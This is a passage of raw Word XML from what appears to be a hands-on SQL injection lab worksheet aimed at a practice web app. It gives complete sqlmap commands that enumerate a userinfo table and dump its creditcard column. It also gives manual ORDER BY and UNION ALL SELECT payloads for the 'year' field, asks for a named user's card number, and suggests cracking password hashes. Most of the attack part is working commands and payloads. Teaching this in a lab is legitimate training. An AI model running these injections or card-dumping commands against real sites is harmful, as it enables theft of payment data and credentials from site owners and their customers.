        <w:t>sqlmap -u "http://www.control.com:88/cdcol/</w:t>
      </w:r>
      <w:r w:rsidR="007B37AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>search_action</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.php?title=&amp;year=1991" --dbms=MySQL --threads=9 -D cdcol -p year -T userinfo --columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656B78F3" w14:textId="77777777" w:rsidR="00B85B20" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="49660B7A">
          <v:shape id="_x0000_s2115" type="#_x0000_t62" style="position:absolute;margin-left:347.05pt;margin-top:8.2pt;width:123.25pt;height:31.1pt;z-index:10;mso-position-vertical-relative:line" adj="-19041,-3855">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="578F6D0B" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434">
                  <w:r>
                    <w:t>all on one line</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="670BE6FB" w14:textId="77777777" w:rsidR="00B85B20" w:rsidRPr="00A0449A" w:rsidRDefault="00B85B20" w:rsidP="00B85B20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When prompted to allow redirection, enter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA909D1" w14:textId="77777777" w:rsidR="00B85B20" w:rsidRDefault="00B85B20" w:rsidP="00B85B20">
      <w:r>
        <w:t>When prompted, accept the defaults (&lt;Enter key&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EA8093" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="50536596" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>List the column names (may need to run a few times)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6D11B2" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354CAA37" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6AD31ED6">
          <v:rect id="_x0000_s2116" style="position:absolute;margin-left:200.55pt;margin-top:4.4pt;width:259pt;height:145.75pt;z-index:11;mso-position-vertical-relative:line">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="0E29A6DB" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434"/>
              </w:txbxContent>
            </v:textbox>
          </v:rect>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="592ABD92" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="57B76FB7" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="3345ABFA" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="12E37043" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="3A567708" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="22214CB1" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="7287F385" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="6496319F" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="70FA87C9" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="563820DB" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="42514EB2" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">We could get the password hashes, but let's go for the $$$. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4444D409" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="1F874127" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="22DB2D84" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlmap -u "http://www.control.com:88/cdcol/</w:t>
      </w:r>
      <w:r w:rsidR="007B37AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>search_action</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.php?title=&amp;year=1991" --dbms=MySQL --threads=9 -D cdcol -p year -T userinfo -C creditcard -</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4052D793">
          <v:shape id="_x0000_s2117" type="#_x0000_t62" style="position:absolute;margin-left:335.35pt;margin-top:10.4pt;width:123.25pt;height:31.1pt;z-index:12;mso-position-horizontal-relative:text;mso-position-vertical-relative:line" adj="-19041,-3855">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="740FB804" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434">
                  <w:r>
                    <w:t>all on one line</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6DEB35" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="0CE52A52" w14:textId="77777777" w:rsidR="00B85B20" w:rsidRPr="00A0449A" w:rsidRDefault="00B85B20" w:rsidP="00B85B20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When prompted to allow redirection, enter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E954C01" w14:textId="77777777" w:rsidR="00B85B20" w:rsidRDefault="00B85B20" w:rsidP="00B85B20">
      <w:r>
        <w:t>When prompted, accept the defaults (&lt;Enter key&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50918F64" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="7B36BEAD" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>If you get a error message, try again, prefixing with sudo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3DDA65" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="25F05618" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sudo sqlmap -u "http://www.control.com:88/cdcol/</w:t>
      </w:r>
      <w:r w:rsidR="006513B8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>search_action</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.php?title=&amp;year=1991" --dbms=MySQL --threads=9 -D cdcol -p year -T userinfo -C creditcard --</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="45250888">
          <v:shape id="_x0000_s2118" type="#_x0000_t62" style="position:absolute;margin-left:350.35pt;margin-top:9pt;width:123.25pt;height:31.1pt;z-index:13;mso-position-horizontal-relative:text;mso-position-vertical-relative:line" adj="-19041,-3855">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="77358930" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434">
                  <w:r>
                    <w:t>all on one line</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1023A4DF" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="4278C3CC" w14:textId="77777777" w:rsidR="00B85B20" w:rsidRPr="00A0449A" w:rsidRDefault="00B85B20" w:rsidP="00B85B20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When prompted to allow redirection, enter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFC3936" w14:textId="77777777" w:rsidR="00B85B20" w:rsidRDefault="00B85B20" w:rsidP="00B85B20">
      <w:r>
        <w:t>When prompted, accept the defaults (&lt;Enter key&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402B86C3" w14:textId="77777777" w:rsidR="00B85B20" w:rsidRDefault="00B85B20" w:rsidP="00563BD6"/>
    <w:p w14:paraId="60DDBEE1" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">While you're waiting you can look at the traffic with Wireshark. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0A7FD" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>From a separate terminal window, run Wireshark as root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C695E1D" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sudo wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214C6A22" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B906DE6" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED4D856" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Options (select eth0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C3589" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E7786" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="39DC36B5" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>You may have to adjust the window and panel sizes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502B8E3A" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="31FC240F" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434">
      <w:r>
        <w:t xml:space="preserve">If you have time, try "--dump"ing the password hashes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310016E3" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434"/>
    <w:p w14:paraId="6B7AC839" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434">
      <w:r>
        <w:t xml:space="preserve">SQLMap can try to deduce the plain text from them user its own built-in rainbow table. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606010AA" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="606C4191" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00BC3434">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finally, SQLMap is stupid. It automates really time-consuming brute forcing of database tables. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C4286" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="3B30E945" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">An intelligent hacker can discover the DBMS (port scanning, banner grabbing, injecting errors and reading the db error messages, using on-line tools), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E71C6B2" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">the database, table and column names (educated guesses, schema mapping, research into open-source web apps), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE07135" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">number of columns (ORDER BY injection), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3663D03A" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>and UNION ALL injection to get the contents of a table in a few queries. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E380FF9" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="37C98133" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">In the web browser (in Kali), go to the </w:t>
      </w:r>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486E4EC7" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>Insert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD10C8C" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="008F70A5" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1991 order by 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DB320C" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">into the </w:t>
      </w:r>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>year</w:t>
      </w:r>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">field. You will get an error. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041BD260" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>Go back to the</w:t>
      </w:r>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F70A5" w:rsidRPr="008F70A5">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>earch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> page and repeat, changing the 12 to 11 and so on until you don't get an error. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A626273" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="38C512FD">
          <v:rect id="_x0000_s2119" style="position:absolute;margin-left:289.45pt;margin-top:5.9pt;width:152.5pt;height:53.6pt;z-index:14;mso-position-vertical-relative:line">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="470E61FA" w14:textId="77777777" w:rsidR="008F70A5" w:rsidRDefault="008F70A5" w:rsidP="008F70A5"/>
              </w:txbxContent>
            </v:textbox>
          </v:rect>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B67AABE" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="008F70A5" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>How many columns are in the embedded query?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030E3A7B" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="008F70A5" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E6331C" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="008F70A5" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41439C61" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="008F70A5" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:pict w14:anchorId="7B76359E">
          <v:rect id="_x0000_s2120" style="position:absolute;margin-left:289.45pt;margin-top:11.15pt;width:152.5pt;height:53.6pt;z-index:15;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2120">
              <w:txbxContent>
                <w:p w14:paraId="3C2E72D1" w14:textId="77777777" w:rsidR="008F70A5" w:rsidRDefault="008F70A5" w:rsidP="008F70A5"/>
              </w:txbxContent>
            </v:textbox>
          </v:rect>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D31299" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="008F70A5" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>How many columns are displayed on the results table?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117D5DDD" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="11869871" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="7392E085" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="64BC345E" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">Inject these into the </w:t>
      </w:r>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>year</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> until one works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2331E346" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="4BE8C833" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="008F70A5" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1990 union ALL select *,1,2 from userinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C552937" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="008F70A5" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1990 union ALL select *,1 from userinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1AF0E8" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="008F70A5" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1990 union ALL select * from userinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698CA86" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:pict w14:anchorId="00F3FA12">
          <v:rect id="_x0000_s2121" style="position:absolute;margin-left:287.05pt;margin-top:11.35pt;width:152.5pt;height:53.6pt;z-index:16;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2121">
              <w:txbxContent>
                <w:p w14:paraId="1F2B498B" w14:textId="77777777" w:rsidR="008F70A5" w:rsidRPr="008F70A5" w:rsidRDefault="008F70A5" w:rsidP="008F70A5">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS"/>
                      <w:i/>
                      <w:color w:val="FF0000"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:rect>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9E5325" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="008F70A5" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F70A5">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>What is Brian's credit card number?</w:t>
      </w:r>
